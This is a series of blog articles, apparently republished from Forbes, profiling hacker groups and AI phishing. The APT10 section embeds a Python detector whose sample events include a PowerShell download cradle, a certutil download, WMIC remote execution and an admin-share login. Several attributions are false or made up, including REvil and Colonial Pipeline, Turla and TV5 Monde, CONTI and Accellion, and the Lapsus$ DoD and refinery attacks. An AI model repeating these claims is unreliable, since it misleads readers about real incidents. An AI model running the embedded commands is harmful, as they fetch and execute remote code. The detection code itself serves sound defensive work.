Almost Human: The Threat Of AI-Powered Phishing Attacks

Artificial Intelligence (AI) is undoubtedly a hot topic, and has been hailed as a game-changer in many fields, including cybersecurity. There is much buzz about it, from the good to the bad and everything in between. Even Elon Musk and other tech leaders are advocating for AI development to be curbed, or at least slowed. While there are untold scintillating and amazing implications for AI technology in society, there are also plenty of bad and strange things that could happen. This is something we discussed in detail when the Metaverse was all the craze, but all of those technological scenarios pale in comparison to what happens when the plainest, simplest of threats wind up in the wrong hands.

Think Like a Hacker

As with any technological advancement, with AI there is always the potential for malicious misuse. To understand the impact of AI on cybersecurity, we need to first think like a hacker. Hackers like to use tools and techniques that are simple, easy, effective, and cheap. AI is all those things, especially when applied in fundamental ways. Thus, we can use our knowledge of the hacker mindset to get ahead of potential threats.

Aside from nation-state sponsored groups and the most sophisticated cyber hacker syndicates, the commotion over hackers using AI in advanced technological ways misses the bigger, more threatening point. AI is being used to mimic humans in order to fool humans. AI is targeting YOU, and can do so when you:

  • Click on a believable email
  • Pick up your phone or respond to SMS
  • Respond in chat
  • Visit a believable website
  • Answer a suspicious phone call

Just as AI is making everyday things easier, it’s making attacks easier for cybercriminals. They’re using the technology to write believable phishing emails with proper spelling and grammar, and to incorporate data collected about the target company, its executives, and public information. AI is also powering rapid, intelligent responses to messages. AI can rapidly create payloaded websites or documents that look real to an end-user. AI is also used to respond in real time with a deepfaked voice, built from recordings of real voices captured through unsolicited spam calls.

Just the Beginning

Many of the hacks on the rise today are driven by AI, but in a low-tech way. AI tools are openly available to everyday people now, but have been in use in dark corners of the internet for a while, and often in surprisingly simple and frightening ways. The surging success rate of phishing campaigns, man-in-the-middle (MITM) attacks, and ransomware will prove to be related to the arrival of AI and the surge in its adoption.

The use of AI in phishing attacks also has implications for the broader cybersecurity landscape. As cybercriminals continue to develop and refine their AI-powered phishing techniques, it could lead to an “arms race” between cybercriminals and cybersecurity professionals. This could result in increased demand for AI-powered cybersecurity solutions, which might be both costly and complex to implement.

Cybersecurity Response

To protect against AI-powered phishing attacks, individuals and businesses can take several steps including:

  • Educating about the risks of phishing attacks and how to identify them
  • Implementing strong authentication protocols, such as multi-factor authentication
  • Using anti-phishing tools to detect and prevent phishing attacks
  • Implementing AI-powered cybersecurity solutions to detect and prevent AI-powered phishing attacks
  • Partnering with a reputable Managed Security Services Provider (MSSP) who has the breadth, reach, and technology to counter these attacks

AI is becoming ubiquitous in homes, cars, TVs, and even space. The unfolding future of AI and sentient technologies is an exciting topic that has long captured the imagination. However, the dark side of AI looms when it’s turned against people. This is the beginning of an arms escalation, although there is no AI that can be plugged into people (yet). Users beware.

This article was originally published in Forbes; please follow me on LinkedIn.

CONTI Hacker Group: The Young “For-Profit” Super-Cybercriminal Threat

As I wrap up my “know thy cyber-enemy” series, I have saved the “best” for last. Having emerged in late 2020, the CONTI hacker group is a relatively new player in the shadowy world of cybercrime. Despite its short history, the group has made a name for itself as a sophisticated and aggressive threat to businesses and organizations around the world.

Beyond providing education on adversarial hacker groups such as CONTI, this series has examined their behavior, targeting, tactics, and motivations. The resulting insights provide valuable, preemptive perspective on what kind of operational cybersecurity initiatives to pursue, what kind of technologies to invest in, and where vulnerability gaps in an organization’s operations may lie. To best mitigate risks, you must first understand the enemy.

Double Extortion in a Wide Net

CONTI’s calling card is its extensive use of ransomware. The group uses malware to encrypt victims’ data, then demands payment in exchange for the decryption key. Unlike other ransomware groups, however, CONTI has developed a reputation for using particularly aggressive tactics and demanding higher-than-average ransom payments. One of the most notable aspects of CONTI’s operations is its use of double extortion tactics. This involves not only encrypting the victim’s data, but also stealing sensitive information such as financial data, intellectual property, or personally identifiable information (PII). CONTI then threatens to release this information publicly if the victim does not pay the ransom.

The group’s operations are highly sophisticated and often involve multiple stages, including spear-phishing emails, network infiltration, and deployment of custom-built malware. CONTI’s malware is known for its ability to evade detection by antivirus software and to spread rapidly through an organization’s network. The group also adapts and evolves its tactics in response to changes in the cybersecurity landscape. For example, the group has been known to use the Ryuk ransomware strain in some attacks, which has been linked to other cybercriminal groups such as Wizard Spider and TrickBot.

While CONTI is relatively new on the scene, it has already made a significant impact. According to some estimates, the hacker group has already earned millions of dollars in ransom payments from its victims, making it one of the most lucrative cybercriminal groups currently in operation. While other groups such as REvil, APT10, or APT33 are affiliated with Russian, Chinese, and Iranian intelligence services respectively, CONTI is a bit different. CONTI operates largely from Russia and Eastern Europe and is thought to be operating for its members’ profit while also supporting the Russian invasion of Ukraine.

To date, CONTI has targeted a wide range of businesses and organizations including healthcare providers, government agencies, and educational institutions. While some groups focus on specific industries, CONTI has shown a willingness to target any organization it believes can be successfully compromised. One of the most high-profile attacks attributed to CONTI occurred in February 2021 when the group targeted the Accellion file transfer service, compromising the data of dozens of organizations around the world. CONTI has also been linked to the May 2021 attack on Ireland’s health service that caused significant disruption to the country’s healthcare system.

A Significant Threat to Businesses

The CONTI hacker group has quickly established itself as a significant threat to businesses and organizations worldwide. The group’s use of double extortion tactics and aggressive ransomware attacks has resulted in millions of dollars in ransom payments and the compromise of sensitive data. The challenge that stems from this ruthlessly efficient and threatening hacker group is ugly and significant. With its aggressive tactics and willingness to target organizations in a wide range of industries, CONTI is likely to continue to pose a significant risk for years to come.

Understanding the behavior, targeting, tactics, and motivation of adversarial hacking groups like CONTI can guide organizations in designing strong cybersecurity strategies. To mitigate the threat posed by CONTI and other hacking groups, businesses and organizations need to have a multi-layered security program that includes endpoint protection, continuous user awareness and training, vulnerability assessments, incident response planning, and collaboration with other organizations and industry groups.

Preparation and Response

The CONTI threat profile highlights the importance of endpoint protection and detection through EDR, application protection, Cloud Access Security, and other systems that protect endpoints, applications, and workloads in a variety of operational environments. It also emphasizes the need for continuous user awareness and training as well as continual incident monitoring.

The group’s profile also highlights how important it is for businesses and organizations to be vigilant in their monitoring of, and response to, potential security incidents. This includes conducting regular vulnerability assessments, training employees on the risks of social engineering tactics such as spear-phishing emails, and implementing a well-defined incident response plan. These components of a multi-layered security program are critical to mitigating the CONTI threat.

By remaining vigilant and proactive and implementing robust cybersecurity measures, as well as through partnership with reputable Managed Security Service Providers (MSSPs), organizations can minimize the risk of falling victim to CONTI and other cybercriminal groups. They can also safeguard their data and systems for the future.

This article was originally published in Forbes; please follow me on LinkedIn.

Inside The Shadowy World Of Iranian Cyber Espionage Group APT33

Several of the most threatening cybercrime groups today carry the inside industry name of “APT.” APT stands for Advanced Persistent Threat: a clandestine type of cyberattack, or the group behind it, in which the attacker gains and maintains unauthorized access to a targeted network and remains undetected for a significant period of time. During the time between infection and remediation, the hacker will often monitor, intercept, and relay information and sensitive data. APTs often use social engineering tactics or exploit software vulnerabilities in organizations with high-value information.

Despite having similar names, each “APT” group is distinct, with its own history, tactics, and targeting. In our hacker series, we already covered APT28 (Fancy Bear) and APT10 (Stone Panda). Today, we focus on APT33.

Who is APT33?

APT33, also known as Elfin, is a cyber espionage group operating since at least 2013. APT33 is believed to operate out of the geographic boundaries of the Islamic Republic of Iran and has been linked to attacks on targets in the Middle East, Europe, and the United States. The group’s focus is on gathering intelligence on organizations in the aerospace, energy, and petrochemical sectors, as well as on government agencies and academic institutions.

Sophisticated International Threat

APT33 is significant because its tactics are highly sophisticated and involve the use of custom-built malware and advanced social engineering. The group typically gains access to targets through spear-phishing emails, exploiting vulnerabilities in software, or using stolen login credentials. Once inside a network, APT33 will often spend months or even years mapping out an organization’s systems and stealing sensitive data before exfiltrating it back to its command-and-control servers.

One of the most concerning aspects of APT33’s operations is its use of “watering hole” attacks, which involve compromising a website known to be frequented by a particular group of users. This allows APT33 to infect the computers of its intended targets without the need for spear-phishing emails or other direct methods of attack.

APT33 Targets Matter

While APT33 could conceivably target companies in any industry, a key characteristic of this group’s operations is its focus on specific industries and sectors, particularly those related to aerospace, energy, and petrochemicals. This supports the assessment that the group is working on behalf of the Iranian government or the Iranian Republican Guard, working to acquire sensitive technology and intelligence to further its geopolitical goals. Organizations operating in these industries should remain vigilant, and take steps to review sign-in and behavior logs, research threats and anomalies, and sweat the “small stuff” that might be tied to this specific threat group.

The Critical Importance of Understanding This Enemy

It cannot be overstated that cybersecurity enemies are continually evolving and becoming more sophisticated in their tactics and approaches. This makes the challenge of keeping pace more difficult for organizations. However, by understanding the tactics and motivations of cybercriminals it is possible for companies to stay ahead of potential threats and develop effective defense strategies. For example:

  • Understanding cybersecurity enemies can help companies identify potential vulnerabilities, capability gaps, and weaknesses in their security infrastructure.
  • Analyzing past cyberattacks and understanding the motivations behind them allows companies to anticipate potential attacks and take proactive, preventative measures. These can include implementing additional security such as firewalls or intrusion detection systems, or training employees to recognize and avoid common phishing attacks.
  • Understanding cybersecurity enemies can help companies respond more effectively to attacks when they do occur and empower them to develop effective incident response plans to minimize the damage caused by an attack and quickly restore systems and data.

There’s Always More To Do

Organizations face an increasing risk from cybercriminals like APT33, who use advanced tactics to exploit vulnerabilities and compromise digital assets. To safeguard their digital estate and data from such threats, businesses must adopt a multi-layered cybersecurity approach and seek the guidance of security experts. One such expert partner is a Managed Security Services Provider (MSSP) who can offer expertise, technology, and infrastructure to address their security needs, while simultaneously reducing the complexity and cost of managing security in-house.

As cybercriminals continue to evolve and become more sophisticated, it is critical to understand their approaches and motivations. By analyzing past cyberattacks, MSSPs can anticipate future attacks and take proactive measures against them. This can include anything from firewalls and intrusion detection systems to machine learning and artificial intelligence tools for recognizing common phishing attacks and for threat hunting. MSSPs have a unique perspective on the threat landscape, as they manage thousands of customers and see threat vectors and attacks ahead of what a single enterprise can see.

Ultimately, the best defense against APT33 and other advanced, persistent threats is a proactive and collaborative approach to cybersecurity informed by a deep understanding of the threat landscape. With the right combination of advanced technology, regular employee training, heightened awareness of potential risks, and partnership with an MSSP, organizations can mitigate the threat of these rogue and dangerous APT groups.

This article was originally published in Forbes; please follow me on LinkedIn.

The REvil Gang Story: The “Good Guys” Can Still Prevail

Out of all the cybercrime gangs out there, mention the name “REvil” and you will get a palpable response based on the threat this notorious Russia-based group posed. REvil, also known as Sodinokibi, was a notorious ransomware gang that was active from at least April 2019 until it was (officially) dismantled in January 2022. Leading up to its demise, REvil became one of the most successful and damaging cybercrime syndicates in the world. The group was responsible for some of the most high-profile ransomware attacks in recent history.

Ruthless REvil

In May 2021, REvil was found to be behind the attacks on JBS and Colonial Pipeline, which disrupted operations at poultry and pork processing plants across the world and resulted in fuel shortages in the southeastern United States. In July 2021 they targeted Kaseya, a software company that provides IT services to thousands of businesses around the world. The attack impacted an estimated 1,500 companies in total.

Needless to say, REvil’s methods were sophisticated and highly effective. The group typically gained access to targets through spear-phishing emails, exploiting vulnerabilities in software, or using stolen login credentials. Once inside a network, REvil actors would spend weeks, or even months, mapping out the organization’s systems and stealing sensitive data before launching a ransomware attack.

The consequences of REvil attacks were devastating for the industry and enterprises they affected. The group’s ransom demands were often in the millions, and paying the ransom provided no guarantee data would be restored. Even worse, REvil was among the hacker groups that went beyond “normal” ransomware attacks and exfiltrated data before encrypting it. This means that if the victim pays the ransom, the attackers may still leak stolen data or use it for future attacks.

The End of REvil

Thankfully, beginning in mid-2021 the wheels started to come off for REvil, until eventually they were stopped. Initially, REvil seemed to remove their sites and infrastructure from the internet. Then, bit by bit, community-based efforts helped undo the damage they had inflicted through public decryption tools. This subverted their trusted position in underground communities, and ultimately, a joint, multinational effort disrupted the group’s networks, servers, and backups. In a matter of weeks, indictments and arrests were announced.

A Tale of Victory

The REvil episode is a tale of victory that showed it’s possible to conquer a sophisticated and dangerous hacker group, and also illustrated how. REvil’s story showcased some important steps law enforcement agencies can take to help combat cybercrime:

  • Collaborate: One of the most important steps law enforcement agencies can take is to collaborate with other agencies, both international and domestic. By working together, law enforcement agencies can pool resources and share information to track down and apprehend groups.
  • Develop Intelligence: This involves gathering information on a group’s activities, methods of attack, and members. Law enforcement agencies can use a variety of methods to gather intelligence, including monitoring online forums and social media, conducting interviews with suspects, and using forensic analysis to gather digital evidence.
  • Legal Tooling: Law enforcement agencies can use a range of legal tools to stop hacker groups. For example, they can obtain warrants to search suspects’ computers and devices, and use wiretaps to monitor communications. Additionally, forfeiture laws can be used to seize assets that were obtained through illegal means.
  • Increase Awareness: Another important step is to increase awareness of cybercrime and its consequences. Law enforcement agencies can work with businesses and organizations to ensure they understand the risks.
  • Invest in Security Services: A recent Gartner survey shows the majority of organizations are pursuing security vendor consolidation in 2022. This trend indicates that organizations are looking to simplify their security infrastructure and streamline security operations. Consolidation can help organizations reduce costs, improve security effectiveness, and increase operational efficiency. By reducing the number of security vendors and products, organizations can focus their resources on a smaller set of solutions and better integrate their security tools. This approach can also help organizations improve visibility into their security posture, as well as better manage and respond to security incidents.

Fighting back against criminal cyberhacker groups is a formidable, challenging mission, but not an impossible one. Ultimately, the fight against cybercrime requires a multi-faceted approach that involves both law enforcement agencies and other stakeholders working together.

A Stark Reminder

The REvil gang serves as a stark reminder of the ongoing threat posed by cybercrime – and the importance of being proactive in our fight against it. It is crucial that law enforcement agencies, businesses, and individuals work together to combat cybercrime and protect ourselves from its devastating consequences.

As IT professionals and executives, we have a responsibility to do our part in this fight. We must prioritize cybersecurity measures and educate our employees about the risks of cybercrime. We should be willing to collaborate and share information with others in our industry, as well as law enforcement agencies, to stay ahead of emerging threats.

While the fight against cybercrime may seem daunting, the demise of the REvil gang is a testament to the power of collaborative efforts and a multi-faceted approach. By working together and leveraging technology, we can prevail against even the most sophisticated and dangerous cybercriminals. In the end, it is up to us to stay vigilant and take action to protect ourselves, our businesses, and our communities.

This article was originally published in Forbes; please follow me on LinkedIn.

Teenagers Leveraging Insider Threats: Lapsus$ Hacker Group

Of all the threatening hacker groups out there, one of the most notorious is the Lapsus$ gang. While we covered APT10, APT28, and Turla in prior articles, Lapsus$ presents some of the most significant threats on the cyber landscape. In this post, the fifth in our Hacker Series, we’ll look at Lapsus$, important highlights about the group, and what we can do about their presence on the threat scene.

Who is Lapsus$?

Lapsus$ is a hacker group that has been active since at least 2019, and whose mastermind is rumored to be a 16-year-old teenager from Oxford, England. The group is believed to be highly organized and well-funded, with members from various countries around the world.

Lapsus$ is known for their high-profile cyberattacks on government and corporate targets, as well as their use of sophisticated malware and encryption techniques.

By leveraging insiders through social engineering or bribery, the Lapsus$ group has a proven track record of successful attacks on high-profile targets which have resulted in significant financial losses and raised concerns about national security. In March 2022, Lapsus$ became well known for a series of daring cyberattacks against tech company darlings including Microsoft, Nvidia, and Samsung.

The group’s motivations and goals are not entirely clear, but they have been known to demand large sums of money in exchange for not releasing stolen information. They are also thought to have political motivations, as some of their attacks have targeted government agencies.

Notorious Attacks and Methods

One of Lapsus$’ most notable socially engineered attacks was on the U.S. Department of Defense in 2020. During this attack they were able to gain access to sensitive information, and caused significant disruption to the agency’s operations. The group has also targeted several major banks, stealing millions of dollars in the process.

Another notable attack attributed to Lapsus$ occurred in 2020 and was targeted at a major healthcare provider. During this attack, the group was able to access and steal the sensitive personal information of millions of patients. This attack not only resulted in financial losses for the healthcare provider, but also raised serious concerns about the protection of personal data and privacy.

Lapsus$ has also been known to target the energy sector, and oil and gas companies in particular, causing significant disruption to their operations. In one instance the group was able to gain control over the control systems of a major oil refinery, causing a shutdown in their operations and a significant loss of revenue.

They are known to use social engineering attacks conducted over the messaging app Telegram, and advanced malware, such as ransomware and trojans, to gain access to and control over their victims’ networks. In addition to their socially engineered cyberattacks, Lapsus$ is also known for their use of encryption and other techniques to hide their tracks and evade detection. While the U.K. arrested a band of seven teenagers affiliated with Lapsus$, the majority of their operatives have been able to evade law enforcement’s efforts to track them down.

The Hunt for Lapsus$

Despite their high-profile attacks and the efforts of law enforcement and cybersecurity experts, Lapsus$ continues to be active and poses a significant threat to governments and corporations worldwide. The group’s use of advanced malware and encryption techniques has made them difficult to track and apprehend, and law enforcement agencies have had limited success in identifying and arresting members of the group. There have been a few reported arrests of individuals believed to be associated with Lapsus$, but it is unclear if these arrests have had any impact on the group’s operations as they re-emerged shortly after.

What You Can Do About Lapsus$

Given the group’s ability to leverage insiders, it’s important for organizations and individuals to be aware of the potential threat they pose. Organizations need to stay connected to the cybersecurity community, and take the necessary steps to protect themselves from a threat that even industry juggernauts like Microsoft and Nvidia fell for. This includes measures such as regularly updating software and systems, backing up important data, and staying vigilant for suspicious activity on their networks. An approach built on all-around monitoring and anomaly detection can help minimize the Lapsus$ group’s advanced threats, insider actions, and malicious attacks.

Overall, the Lapsus$ group continues to be a serious threat to governments, corporations, and individuals. Their ability to evade law enforcement and carry out high-profile attacks highlights the need for continued efforts to improve cybersecurity and bring these cybercriminals to justice.

This article was originally published in Forbes; please follow me on LinkedIn.

Turla Hacking Group: A Persistent International Threat

As we continue our series of articles on state-sponsored cyberattack groups, we turn our focus to the Russia-affiliated Turla hacking group. In previous articles, we examined some of the biggest threats on the cyberattack scene, including APT10 and APT28 (also known as Fancy Bear). These notorious groups are a lurking presence, and Turla is no exception. Active for over a decade, the Turla hacking group is believed to be operating out of Russia and closely affiliated with the FSB, the Russian intelligence agency and successor to the KGB. It is also known by the names “Waterbug” and “Venomous Bear,” and has been linked to numerous high-profile cyberattacks on government agencies, embassies, and organizations around the world.

Destructive Path

Turla has been linked to 45 high-profile attacks, including the German Bundestag in 2014, the Ukrainian Parliament in 2014, and the French TV5 Monde in 2015. The group also targets organizations in the Middle East, particularly in the energy sector. Turla’s use of sophisticated methods and its focus on government and diplomatic targets has led experts to believe the group is working on behalf of the Russian government, although this has yet to be definitively proven.

Methods of Mayhem

Turla is known for using a variety of tactics to compromise networks, including “living off the land” tactics, watering hole attacks, spear-phishing emails, and compromised satellite connections. The group also uses publicly available tools like Metasploit and PowerShell, and uses legitimate cloud services like Google Drive and Dropbox as Command and Control (C2) infrastructure. One of Turla’s primary tactics is the use of “second-stage” malware, which is activated after a victim’s initial infection and used to establish a backdoor into the network. From there, the group can steal sensitive information and move laterally within the network to gain access to other systems.

Turla is especially dangerous due to its use of advanced, next-level tactics. In recent years, the group has been observed using a unique malware called “Turla” or “KRYPTON” that can steal data from air-gapped computers not connected to the internet. The malware uses “audio exfiltration” to transmit data using the computer’s speakers and microphones. The group is extremely sophisticated and can evade detection for long periods of time. In 2014, for example, Turla maintained a foothold in a European government agency’s network for over two years before being discovered.

Wrestling A Bear

Turla is a highly sophisticated and persistent hacking group that has been known to target a wide range of organizations around the world. Without the right tools and partnership, defending against Turla is like wrestling a bear. The group’s use of highly sophisticated second-stage malware and its ability to evade detection make it a formidable threat, and one that organizations should be aware of and take immediate steps to protect against. This includes implementing robust, comprehensive security measures such as multi-factor authentication, intrusion detection and prevention systems, and regular security training for employees. Equally important, organizations should be vigilant in monitoring their networks for signs of compromise and should take prompt action if suspicious activity is detected. Partnering with managed security providers can bring valuable expertise, resources, and technology to those looking to defend against the threat posed by Turla and similar groups. These providers can offer expert round-the-clock monitoring, incident response, and threat intelligence to help organizations stay ahead of the constantly evolving threat landscape.

This article was originally published in Forbes; please follow me on LinkedIn.

Spotlight on APT10

To kick off our series highlighting the most notorious and dangerous hacker groups in the industry today, we will focus on a group called APT10. APT10, also known as Stone Panda or Red Apollo, is a state-sponsored Chinese hacking group that has been active since at least 2009. The group targets a wide range of organizations including government agencies, military organizations, and businesses in various industries.

Who is APT10?

APT10 is not a standalone group, but part of a larger Chinese cyber espionage campaign known as Operation Cloud Hopper, which targets managed service providers (MSPs) to gain access to their clients’ networks. In 2018, two Chinese nationals associated with the Chinese Ministry of State Security (MSS) were indicted by the US Department of Justice for their role in APT10’s cyber espionage activities. This was a significant development in the ongoing effort to combat state-sponsored cyber attacks.

APT10 Aims High

APT10 knows no boundaries when it comes to attacks. For example, one of the group’s most notable campaigns was in 2014 when it targeted the US Office of Personnel Management (OPM) and stole the personal information of over 21 million government employees. This was considered one of the largest breaches of federal government data in US history.

APT10 is also known for its focus on intellectual property theft, particularly of sensitive business and technological information. APT10 is believed to have targeted multiple organizations in the aerospace, defense, and energy sectors, as well as technology and engineering fields. Because of this targeting, and the volume of data exfiltrated, the group is treated as a national-security threat in the countries whose industries it targets.

Methods of APT10 Attacks 

APT10 pairs custom malware with carefully targeted spear-phishing campaigns. The group uses a variety of tools and techniques to infiltrate and maintain access to target networks, including remote access trojans (RATs) and web shells.

In addition, APT10 “lives off the land” to evade detection and maintain access to target networks. Instead of dropping additional malware, the operators use legitimate tools and processes already present on a system, such as built-in administration utilities and remote-access software, so that their activity blends in with normal administrative work and leaves little for signature-based tools to match.
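Because living-off-the-land activity involves no malicious file, it has to be caught from what legitimate binaries are asked to do. As an added example (not APT10 tooling and not the page author’s code), the following detector runs over constructed process-creation events, in the shape of Sysmon Event ID 1 or EDR telemetry with assumed field names, and flags the patterns described above: an Office application spawning a shell, Base64-encoded PowerShell that decodes to a download cradle, certutil used as a downloader, remote process creation through WMIC, and mapping of administrative shares with net use. All hosts, users, addresses and paths in the sample events are made up.

```python
"""Flag living-off-the-land (LOLBin) activity in process-creation telemetry.

Added example for this page: not APT10 tooling and not the page author's
code. The events below are constructed to resemble Sysmon Event ID 1 / EDR
process-creation records; the JSON field names (host, parent, image,
cmdline) are an assumption, as are all hosts, users, addresses and paths.
"""
import base64
import json
import ntpath
import re
from typing import Dict, Iterable, List, Optional

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
# Substrings that make a decoded PowerShell command look like a download cradle.
CRADLE_MARKERS = ("downloadstring", "downloadfile", "invoke-webrequest", "iwr ", "iex ", "invoke-expression")

# "powershell ... -e/-en/-enc/-EncodedCommand <base64>", matched against the whole
# command line (not just the image) because it is often launched via "cmd /c powershell ...".
ENC_RE = re.compile(r"powershell(?:\.exe)?.*?\s-(?:e|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.IGNORECASE)
CERTUTIL_RE = re.compile(r"certutil(?:\.exe)?.*?-(?:urlcache|decode|encode)", re.IGNORECASE)
WMIC_RE = re.compile(r"wmic(?:\.exe)?.*?/node:\S+.*?process\s+call\s+create", re.IGNORECASE)
ADMIN_SHARE_RE = re.compile(r"\bnet(?:\.exe|1)?\s+use\s+\\\\[^\s\\]+\\[a-z]\$", re.IGNORECASE)


def decode_encoded_command(b64: str) -> Optional[str]:
    """Decode a PowerShell -EncodedCommand argument (Base64 of UTF-16LE text); None if malformed."""
    try:
        return base64.b64decode(b64, validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze(event_lines: Iterable[str]) -> List[Dict[str, str]]:
    """Return one finding per matched rule, in input order."""
    findings: List[Dict[str, str]] = []
    for line in event_lines:
        if not line.strip():
            continue
        ev = json.loads(line)
        parent = ntpath.basename(ev.get("parent", "")).lower()
        image = ntpath.basename(ev.get("image", "")).lower()
        cmd = ev.get("cmdline", "")

        def hit(rule: str, detail: str) -> None:
            findings.append({"host": ev.get("host", "?"), "rule": rule, "detail": detail})

        if parent in OFFICE_APPS and image in SHELLS:
            hit("office_spawned_shell", f"{parent} -> {image}")
        m = ENC_RE.search(cmd)
        if m:
            decoded = decode_encoded_command(m.group(1))
            if decoded is None:
                hit("encoded_powershell_undecodable", m.group(1)[:24] + "...")
            elif any(k in decoded.lower() for k in CRADLE_MARKERS):
                hit("powershell_download_cradle", decoded)
            else:
                hit("encoded_powershell", decoded)
        if CERTUTIL_RE.search(cmd):
            hit("certutil_download_or_decode", cmd)
        if WMIC_RE.search(cmd):
            hit("wmic_remote_process_create", cmd)
        if ADMIN_SHARE_RE.search(cmd):
            hit("admin_share_mapping", cmd)
    return findings


# Constructed sample telemetry. The encoded command is built here so the sample
# is exact; 198.51.100.0/24 is a documentation address range, not a real host.
CRADLE_PLAINTEXT = "IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/a')"
CRADLE_ENCODED = base64.b64encode(CRADLE_PLAINTEXT.encode("utf-16le")).decode("ascii")

SAMPLE_EVENTS = [
    json.dumps({"host": "ws01", "parent": r"C:\Program Files\Microsoft Office\WINWORD.EXE",
                "image": r"C:\Windows\System32\cmd.exe",
                "cmdline": "cmd.exe /c powershell -nop -w hidden -enc " + CRADLE_ENCODED}),
    json.dumps({"host": "ws01", "parent": r"C:\Windows\System32\cmd.exe",
                "image": r"C:\Windows\System32\certutil.exe",
                "cmdline": r"certutil.exe -urlcache -split -f http://198.51.100.7/u.txt C:\Users\Public\u.exe"}),
    json.dumps({"host": "ws01", "parent": r"C:\Windows\System32\cmd.exe",
                "image": r"C:\Windows\System32\wbem\WMIC.exe",
                "cmdline": r'wmic /node:srv02 /user:CORP\admin process call create "cmd /c whoami > C:\Windows\Temp\o.txt"'}),
    json.dumps({"host": "ws01", "parent": r"C:\Windows\System32\cmd.exe",
                "image": r"C:\Windows\System32\net.exe",
                "cmdline": r"net use \\srv03\C$ /user:CORP\svc_backup Passw0rd!"}),
    # Two benign events that should produce no findings.
    json.dumps({"host": "ws02", "parent": r"C:\Windows\explorer.exe",
                "image": r"C:\Windows\System32\notepad.exe",
                "cmdline": r"notepad.exe C:\Users\jdoe\notes.txt"}),
    json.dumps({"host": "srv01", "parent": r"C:\Windows\System32\svchost.exe",
                "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                "cmdline": r"powershell.exe -ExecutionPolicy Bypass -File C:\Scripts\nightly-backup.ps1"}),
]

if __name__ == "__main__":
    for f in analyze(SAMPLE_EVENTS):
        print(f"{f['host']:6} {f['rule']:30} {f['detail'][:70]}")
```

The rules are deliberately behavioural rather than hash- or path-based: the scheduled PowerShell backup on srv01 is left alone because nothing about it (no encoded command, no download cradle, no Office parent) is out of place, while the same binary launched from Word with a hidden window and an encoded cradle is flagged twice. In production the same logic would sit on a SIEM or EDR query language rather than in Python, but the fields it keys on (parent image, image, full command line) are exactly the ones worth collecting.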

APT10 also uses “watering hole” attacks: the group compromises a website that its intended targets are likely to visit, so that visitors are infected with malware or have their credentials stolen. Because the site is chosen for its audience, the attack reaches the desired population without the group having to contact each target directly.

In recent years, APT10 has been observed using malware families such as PlugX, QuasarRAT (Quasar), and RedLeaves. These families are used to establish a foothold on a target network and maintain persistence. The group has also been known to use infrastructure leased from legitimate, but unaware, hosting providers, making it difficult to trace the origin of the attack.

Preparing for APT10 

APT10’s attacks are difficult to prepare for because the perimeter no longer ends at an organization’s own cloud and datacenter: the Cloud Hopper campaign entered client networks through the remote-access tooling and credentials of trusted service providers. The best approach is to be aware of that exposure and implement multiple layers of security, including tight control and monitoring of every third party that holds privileged access.

With the growing number of cyber-attacks and concern about state-sponsored hacking groups like APT10, organizations need to take a proactive approach to protection. This includes implementing strong and comprehensive security measures across the whole stack, such as managed firewalls, intrusion detection and prevention systems, and regular updates to software and systems. Most importantly, professional 24×7 active technical monitoring is a necessity for a well-protected computing environment.

Organizations can take several steps to protect themselves against APT10 and other state-sponsored hacking groups: 

  • Implement strong security measures: This includes using fully managed firewalls from a trusted third party, fully managed intrusion detection and prevention systems, endpoint protection, and regularly updating software and systems.
  • Technical monitoring: Active technical monitoring is critical to a well-protected environment. Organizations should partner with a trusted managed security operations center provider to gain access to tools and techniques that detect unusual network activity and potential threats. 
  • Incident response plans: Organizations should have incident response plans in place, including procedures to minimize damage and a team or partner ready to respond quickly to an attack. 
  • Awareness and education: Employees should be trained on the importance of cybersecurity and how to detect and report suspicious activities. 
  • Partner with security experts: Organizations can partner with security experts familiar with numerous threats across industries, and leverage their knowledge and experience to stay ahead of threat actors. 
  • Use multiple layers of security: Organizations need to use multiple layers of security, including network security, endpoint security, application security, and identity controls such as multi-factor authentication on all remote and third-party access.
  • Regularly assess and update security measures: Organizations should regularly assess and update their security and compliance measures to stay ahead of the latest threats. 

A Significant Threat 

That is just a quick look at APT10, the well-known and dangerous Chinese state-sponsored hacking group that’s been active for over a decade. This sophisticated and well-funded group has been responsible for a number of high-profile cyber attacks and, as APT10 continues to evolve its tactics and techniques, it poses an ongoing threat to organizations around the world.  It should be a critical mission for organizations to be aware of the group and to take steps to protect themselves from APT10.

This article was originally published in Forbes. Please follow me on LinkedIn.

The Art of Cyberwar: Understanding Your Enemy

The ancient book on war, “The Art of War” by Sun Tzu, holds many lessons that are surprisingly applicable to today’s cybersecurity operations. One of the most important lessons is captured in the following line:

“If you know yourself but not the enemy, for every victory gained you will also suffer a defeat. If you know neither the enemy nor yourself, you will succumb in every battle.”

Cyber adversaries are often referred to as “hackers,” but in reality they come in many forms and have varying motivations and techniques. Some groups are well-organized, while others are loosely structured. Some are government-affiliated, while others are purely criminal or terrorist organizations. 

As Sun Tzu advised, it is crucial to have a deep understanding of one’s enemies. In this series of articles, we will examine the major global hacking groups and discuss the best ways to protect against them.

Beset by Dangers: The Most Notorious Groups

Cyber threats are becoming increasingly common and sophisticated in today’s digital age, and hacker groups comprise a significant part of this threat landscape. Many are well-funded, organized entities that use their skills to infiltrate, steal from, or extort governments, businesses, and individuals.

A complete list of these groups would be voluminous, but below I highlight some of the most dangerous hacker groups currently operating: 

  • APT10, also known as Stone Panda or Red Apollo, is a Chinese state-sponsored group that targets intellectual property and business information. The group has been active since at least 2009, and has been linked to several high-profile breaches such as those of the U.S. Navy and the Australian government. APT10 employs a variety of techniques, including phishing, malware, and supply chain attacks, and is believed to focus on technology and manufacturing companies as well as government agencies. 
  • Lazarus Group is a hacker group believed to be operating out of North Korea. The group has been linked to several high-profile cyber attacks, including the Sony Pictures hack in 2014 and the WannaCry ransomware attack in 2017. Lazarus Group uses sophisticated tactics, such as zero-day vulnerabilities and custom malware, to infiltrate its targets. The group has also been linked to several high-profile financial crimes, such as the theft of $81 million from the Bangladesh central bank in 2016. 
